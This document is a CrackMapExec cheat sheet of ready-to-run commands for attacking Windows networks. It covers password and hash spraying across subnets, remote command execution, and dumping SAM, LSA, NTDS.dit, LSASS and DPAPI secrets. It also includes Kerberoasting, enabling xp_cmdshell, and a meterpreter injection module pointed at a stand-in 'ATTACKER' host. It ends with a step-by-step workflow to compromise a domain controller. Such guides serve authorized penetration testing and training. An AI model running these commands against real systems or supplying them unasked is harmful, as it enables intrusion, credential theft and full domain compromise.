CrackMapExec Guide

CrackMapExec (CME) is the Swiss Army knife for Windows network pentesting. It automates credential spraying, lateral movement, and post-exploitation across entire subnets in a single command.

Installation

pip install crackmapexec
# or
pip install git+https://github.com/Porchetta-Industries/CrackMapExec

# Docker
docker pull byt3bl33d3r/crackmapexec

# Verify
cme --help
crackmapexec --help   # both work

Protocol Syntax

crackmapexec <protocol> <target> [options]

# Protocols: smb, winrm, ldap, mssql, ssh, ftp, rdp

SMB — Core Protocol

# Basic check (enumerate shares, signing, hostname)
crackmapexec smb 192.168.1.0/24

# Test credentials
crackmapexec smb 192.168.1.100 -u Administrator -p 'Password123'
crackmapexec smb 192.168.1.100 -u Administrator -H NT_HASH

# Credential spraying (one password, many users)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!'

# Password spray (many passwords, one user)
crackmapexec smb 192.168.1.0/24 -u Administrator -p passwords.txt

# Combo file (username:password pairs)
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce

# Hash spray
crackmapexec smb 192.168.1.0/24 -u users.txt -H hashes.txt

# Show only successes (green)
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt 2>/dev/null | grep -v "[-]"

Shares and Files

# List shares
crackmapexec smb 192.168.1.100 -u user -p pass --shares

# List files in a share
crackmapexec smb 192.168.1.100 -u user -p pass -M spider_plus -o SHARE=share_name

# Spider all shares and find interesting files
crackmapexec smb 192.168.1.0/24 -u user -p pass -M spider_plus

# Read file
crackmapexec smb 192.168.1.100 -u user -p pass --get-file "\\path\\to\\file" /local/path

# Upload file
crackmapexec smb 192.168.1.100 -u user -p pass --put-file /local/file "\\remote\\path"

Command Execution

# Execute command
crackmapexec smb 192.168.1.100 -u Administrator -p pass -x "whoami"

# PowerShell execution
crackmapexec smb 192.168.1.100 -u Administrator -p pass -X "Get-Process"

# Execute on all hosts in subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -p pass -x "ipconfig"

# Exec method (wmiexec, smbexec, atexec, mmcexec)
crackmapexec smb 192.168.1.100 -u admin -p pass -x "cmd" --exec-method wmiexec

Credential Dumping

# SAM database (local hashes)
crackmapexec smb 192.168.1.100 -u admin -p pass --sam

# LSA secrets
crackmapexec smb 192.168.1.100 -u admin -p pass --lsa

# NTDS.dit (domain controller — all domain hashes)
crackmapexec smb DC_IP -u admin -p pass --ntds

# NTDS with method
crackmapexec smb DC_IP -u admin -p pass --ntds --ntds-pwdLastSet

# LSASS (Mimikatz module)
crackmapexec smb 192.168.1.100 -u admin -p pass -M mimikatz

# dpapi (browser passwords, wifi passwords)
crackmapexec smb 192.168.1.100 -u admin -p pass -M dpapi

Modules

# List available modules
crackmapexec smb -L

# Run a module
crackmapexec smb 192.168.1.100 -u admin -p pass -M <module_name>

# Module options
crackmapexec smb 192.168.1.100 -u admin -p pass -M module_name -o KEY=value

Useful Modules

# Enum users via RPC
crackmapexec smb 192.168.1.100 -u admin -p pass -M enum_av    # AV detection
crackmapexec smb 192.168.1.100 -u admin -p pass -M get_netconnections
crackmapexec smb 192.168.1.100 -u admin -p pass -M ioxidresolver
crackmapexec smb 192.168.1.100 -u admin -p pass -M webdav      # check webdav
crackmapexec smb 192.168.1.100 -u admin -p pass -M drop-sc    # drop shortcut for hash capture
crackmapexec smb 192.168.1.100 -u admin -p pass -M empire_exec -o LISTENER=http
crackmapexec smb 192.168.1.100 -u admin -p pass -M met_inject -o LHOST=ATTACKER LPORT=4444

LDAP Protocol

# Basic LDAP enumeration
crackmapexec ldap 192.168.1.100 -u user -p pass --get-sid
crackmapexec ldap DC_IP -u user -p pass --users        # enumerate users
crackmapexec ldap DC_IP -u user -p pass --groups       # enumerate groups
crackmapexec ldap DC_IP -u user -p pass --computers    # enumerate computers

# Password policy (for spraying safely)
crackmapexec ldap DC_IP -u user -p pass --pass-pol

# Kerberoasting via LDAP
crackmapexec ldap DC_IP -u user -p pass --kerberoasting kerberoast.txt

# AS-REP Roasting
crackmapexec ldap DC_IP -u user -p pass --asreproast asreproast.txt

WinRM Protocol

WinRM = Windows Remote Management (PowerShell Remoting):

# Test WinRM access
crackmapexec winrm 192.168.1.100 -u Administrator -p pass

# Execute command
crackmapexec winrm 192.168.1.100 -u Administrator -p pass -x "whoami"

# Interactive shell
evil-winrm -i 192.168.1.100 -u Administrator -p pass

MSSQL Protocol

# Test authentication
crackmapexec mssql 192.168.1.100 -u sa -p password

# Execute query
crackmapexec mssql 192.168.1.100 -u sa -p pass -q "SELECT @@version"

# Enable xp_cmdshell
crackmapexec mssql 192.168.1.100 -u sa -p pass -M mssql_priv

# Execute OS command
crackmapexec mssql 192.168.1.100 -u sa -p pass -x "whoami"

# Read file
crackmapexec mssql 192.168.1.100 -u sa -p pass -q "SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_BLOB) x"

Database — Track Findings

CME uses a SQLite database to track findings:

# View the database
cmedb

# Inside cmedb:
hosts              # list all hosts
creds              # list all credentials
creds add smb user pass     # add credentials manually
shares             # list shares

Output and Logging

# Save output to file
crackmapexec smb 192.168.1.0/24 -u admin -p pass > output.txt 2>&1

# JSON output
crackmapexec smb 192.168.1.0/24 -u admin -p pass --log output.log

# Filter successes
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt | grep "+"

Common Attack Workflow

# Step 1: Network discovery
crackmapexec smb 192.168.1.0/24

# Step 2: Password spray (check policy first!)
crackmapexec ldap DC_IP -u validuser -p password --pass-pol
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success

# Step 3: Dump creds on owned hosts
crackmapexec smb owned_hosts.txt -u admin -p pass --sam --lsa

# Step 4: Spray new credentials
crackmapexec smb 192.168.1.0/24 -u new_users.txt -H hashes.txt

# Step 5: Target DC
crackmapexec smb DC_IP -u DA_user -H DA_HASH --ntds